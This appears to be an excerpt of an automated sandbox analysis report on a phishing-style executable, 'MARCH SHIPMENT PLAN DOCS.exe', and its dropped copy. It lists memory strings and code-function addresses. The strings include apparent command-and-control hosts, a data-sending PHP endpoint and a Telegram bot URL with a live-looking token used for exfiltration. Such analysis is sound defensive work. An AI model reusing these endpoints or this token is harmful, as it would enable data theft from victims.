Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/ |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1321551762.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a |
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003249000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003244000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E14000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org |
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000312B000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$ |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/ |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000327A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4 |
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003275000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B86CA | 0_2_071B86CA |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B86E8 | 0_2_071B86E8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B9390 | 0_2_071B9390 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071BB008 | 0_2_071BB008 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B8F58 | 0_2_071B8F58 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B8F48 | 0_2_071B8F48 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B8B11 | 0_2_071B8B11 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 0_2_071B8B20 | 0_2_071B8B20 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2D278 | 10_2_02F2D278 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F25370 | 10_2_02F25370 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2A088 | 10_2_02F2A088 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2C147 | 10_2_02F2C147 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F27118 | 10_2_02F27118 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2C738 | 10_2_02F2C738 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2C468 | 10_2_02F2C468 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2CA08 | 10_2_02F2CA08 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F269A0 | 10_2_02F269A0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2E988 | 10_2_02F2E988 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2CFAB | 10_2_02F2CFAB |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2CCD8 | 10_2_02F2CCD8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F23A99 | 10_2_02F23A99 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F229E0 | 10_2_02F229E0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2E97B | 10_2_02F2E97B |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F2F961 | 10_2_02F2F961 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_02F23E09 | 10_2_02F23E09 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F21FA8 | 10_2_06F21FA8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F29448 | 10_2_06F29448 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F29D38 | 10_2_06F29D38 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F22A90 | 10_2_06F22A90 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F21850 | 10_2_06F21850 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F25148 | 10_2_06F25148 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2D670 | 10_2_06F2D670 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2D660 | 10_2_06F2D660 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F29668 | 10_2_06F29668 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2E7D0 | 10_2_06F2E7D0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2E7C0 | 10_2_06F2E7C0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F21F9F | 10_2_06F21F9F |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2DF20 | 10_2_06F2DF20 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2DF11 | 10_2_06F2DF11 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F4D8 | 10_2_06F2F4D8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F28CC0 | 10_2_06F28CC0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F4C8 | 10_2_06F2F4C8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F28CB1 | 10_2_06F28CB1 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2EC28 | 10_2_06F2EC28 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2EC18 | 10_2_06F2EC18 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2CDC0 | 10_2_06F2CDC0 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2DAC8 | 10_2_06F2DAC8 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2DAB9 | 10_2_06F2DAB9 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2D218 | 10_2_06F2D218 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2E378 | 10_2_06F2E378 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2E369 | 10_2_06F2E369 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F20B30 | 10_2_06F20B30 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F20B20 | 10_2_06F20B20 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F080 | 10_2_06F2F080 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F071 | 10_2_06F2F071 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F20040 | 10_2_06F20040 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F21841 | 10_2_06F21841 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F20006 | 10_2_06F20006 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F930 | 10_2_06F2F930 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2513F | 10_2_06F2513F |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Code function: 10_2_06F2F921 | 10_2_06F2F921 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DF5294 | 12_2_02DF5294 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DFBCE8 | 12_2_02DFBCE8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DF47D8 | 12_2_02DF47D8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DF47D3 | 12_2_02DF47D3 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DF6791 | 12_2_02DF6791 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DF2874 | 12_2_02DF2874 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02DFBCD9 | 12_2_02DFBCD9 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02E1B5A0 | 12_2_02E1B5A0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02E1E52E | 12_2_02E1E52E |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02E19BA0 | 12_2_02E19BA0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_02E19B8F | 12_2_02E19B8F |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_070586D8 | 12_2_070586D8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_070586E8 | 12_2_070586E8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_07059390 | 12_2_07059390 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_0705B008 | 12_2_0705B008 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_07058F48 | 12_2_07058F48 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_07058F58 | 12_2_07058F58 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_07058B11 | 12_2_07058B11 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 12_2_07058B20 | 12_2_07058B20 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_01227118 | 20_2_01227118 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122C148 | 20_2_0122C148 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_01225370 | 20_2_01225370 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122D278 | 20_2_0122D278 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122C468 | 20_2_0122C468 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122C738 | 20_2_0122C738 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_012269B0 | 20_2_012269B0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122E988 | 20_2_0122E988 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122CA08 | 20_2_0122CA08 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_01229DE0 | 20_2_01229DE0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122CCD8 | 20_2_0122CCD8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122CFAB | 20_2_0122CFAB |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122F961 | 20_2_0122F961 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122F970 | 20_2_0122F970 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_0122E97B | 20_2_0122E97B |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_012239EE | 20_2_012239EE |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_012229EC | 20_2_012229EC |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_01223AA1 | 20_2_01223AA1 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_01223E18 | 20_2_01223E18 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B1FA8 | 20_2_069B1FA8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B9448 | 20_2_069B9448 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B9D38 | 20_2_069B9D38 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B2A90 | 20_2_069B2A90 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B1850 | 20_2_069B1850 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B5148 | 20_2_069B5148 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BD670 | 20_2_069BD670 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B9668 | 20_2_069B9668 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BD660 | 20_2_069BD660 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B1FA2 | 20_2_069B1FA2 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BE7D0 | 20_2_069BE7D0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BE7C0 | 20_2_069BE7C0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BDF1F | 20_2_069BDF1F |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BDF11 | 20_2_069BDF11 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BDF20 | 20_2_069BDF20 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B8CB1 | 20_2_069B8CB1 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BF4D8 | 20_2_069BF4D8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B8CC0 | 20_2_069B8CC0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BEC18 | 20_2_069BEC18 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BEC28 | 20_2_069BEC28 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BCDAF | 20_2_069BCDAF |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BCDC0 | 20_2_069BCDC0 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BDAB9 | 20_2_069BDAB9 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BDAC8 | 20_2_069BDAC8 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BD218 | 20_2_069BD218 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BD209 | 20_2_069BD209 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B0B30 | 20_2_069B0B30 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B0B20 | 20_2_069B0B20 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BE378 | 20_2_069BE378 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BE36A | 20_2_069BE36A |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BF080 | 20_2_069BF080 |
